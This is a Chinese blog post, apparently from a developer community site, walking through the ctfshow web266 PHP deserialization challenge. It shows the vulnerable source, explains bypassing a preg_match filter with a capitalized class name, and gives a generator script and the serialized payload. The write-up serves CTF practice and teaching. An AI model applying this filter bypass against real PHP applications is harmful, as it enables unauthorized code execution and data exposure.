PHP反序列化题型_绕过preg_match1-摩杜云开发者社区

PHP反序列化题型_绕过preg_match1

cv1l28rUMlGf 2023年11月19日 35 0

php CTF 反序列化

ctfshow web266

<?php

highlight_file(__FILE__);

include('flag.php');
$cs = file_get_contents('php://input');


class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}
?>

本题利用的是php的类名和方法名不缺分大小写特性（但是变量名敏感），利用大写类名绕过preg_match检查。

但是本题也有一个坑点，payload不能再urlencode，因为是通过php://input提交，并不会在后台进行urldecode，如果换作get提交则可用urlencode后再提交

<?php
class Ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';

}

$a =new Ctfshow();

//echo urlencode(serialize($a));
echo serialize($a);
?>

payload:

O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}

PHP反序列化题型_绕过preg_match1_php

【版权声明】本文内容来自摩杜云社区用户原创、第三方投稿、转载，内容版权归原作者所有。本网站的目的在于传递更多信息，不拥有版权，亦不承担相应法律责任。如果您发现本社区中有涉嫌抄袭的内容，欢迎发送邮件进行举报，并提供相关证据，一经查实，本社区将立刻删除涉嫌侵权内容，举报邮箱： cloudbbs@moduyun.com

上一篇： MySQL数据库的安全性：保护您的数据安全（mysql数据库的安全性）下一篇： PHP反序列化题型_地址传参

分享：

最后一次编辑于 2023年11月19日 0

暂无评论

推荐阅读

BUUCTF-MISC-你竟然赶我走

rKeEjcARIgc2 2023年12月06日 26 0 0 CTF misc 杂项

反序列化中利用代码逻辑绕过__wakeup()函数的方法

7o0lrI1v52Tn 2023年11月27日 47 0 0 php POP 反序列化 wakeup绕过

[网鼎杯 2020 青龙组]AreUSerialz 1 (两种解法超详细！）

rKeEjcARIgc2 2023年11月28日 21 0 0 php web安全 CTF 网络安全反序列化

BUUCTF [CISCN2019 华北赛区 Day2 Web1]Hack World 1(SQL注入之布尔盲注）

rKeEjcARIgc2 2023年12月09日 22 0 0 数据库 web安全 CTF 网络安全 SQL

Catf1agCTF-WEB签到

rKeEjcARIgc2 2023年12月09日 25 0 0 web安全 CTF 网络安全 python 前端

DVWA文件上传【三个等级】

5XUZ4xzRd7aT 2023年12月11日 20 0 0 php 上传正常运行

CTF Web SQL注入专项整理（持续更新中）

rKeEjcARIgc2 2023年11月30日 33 0 0 php web安全 CTF 网络安全 SQL

BUUCTF [SUCTF 2019]CheckIn 1（user.ini文件构成的PHP后门 | 两种解法！）

rKeEjcARIgc2 2023年11月30日 29 0 0 php web安全 CTF 网络安全文件上传

BUUCTF [MRCTF2020]Ez_bypass 1

rKeEjcARIgc2 2023年11月26日 43 0 0 php web安全 CTF 网络安全 md5

【父子进程/AES/XTEA/SMC】赛后复盘

gwoSVbAzuFy4 2023年12月08日 97 0 0 CTF 父子进程 AES XTEA SMC

polar ctf 2023冬季挑战赛wp

7o0lrI1v52Tn 2023年12月10日 33 0 0 php CTF web

极客挑战2023部分wp

7o0lrI1v52Tn 2023年11月28日 35 0 0 php CTF 极客挑战2023

[GYCTF2020]Blacklist 1详解（handler命令用法!)

rKeEjcARIgc2 2023年12月02日 23 0 0 web安全 MySQL CTF 网络安全 0day

cv1l28rUMlGf

作者其他文章更多

PHP特性的几种题型

2023-11-19

PHP反序列化题型_地址传参

2023-11-19

PHP反序列化题型_绕过preg_match1

2023-11-19

PHP反序列化题型_YII框架漏洞利用

2023-11-19

PHP反序列化题型_Laravel框架漏洞利用

2023-11-19

PHP反序列化题型_think漏洞利用

2023-11-19

最新推荐更多

BUUCTF-WEB(4-8)

2024-05-20

常回家看看之堆溢出

2024-05-20

BUUCTF-WEB(9-14)

2024-05-20

“复兴杯”2023第四届大学生网络安全精英赛排位赛 Writeup

2024-05-20

BUUCTF-WEB(15-20)

2024-05-20

MJUCTF—WP

2024-05-18

Weblogic T3反序列化漏洞（CVE-2018-2628）

2024-05-18

文件处理漏洞--文件上传

2024-05-17

应急响应web1

2024-05-17

Stratum挖矿协议&XMR挖矿流量分析

2024-05-17

以数字守护汉字！天翼云TeleDB数据库获GB 18030最高级别认证！

2024-05-17

CSRF(Pikachu靶场练习)

2024-05-17

SQL注入(pikachu)

2024-05-17

流量特征提取工具NFStream

2024-05-17

LoRa与NB-IoT两大低功耗通信技术对比

2024-05-17

记一些CISP-PTE题目解析

2024-05-17

Webshell流量分析之菜刀Chopper&蚁剑AntSword

2024-05-17

RCE(Pikachu)

2024-05-17

不安全的URL跳转(Pikachu)

2024-05-17

不安全的文件上传(Pikachu)

2024-05-17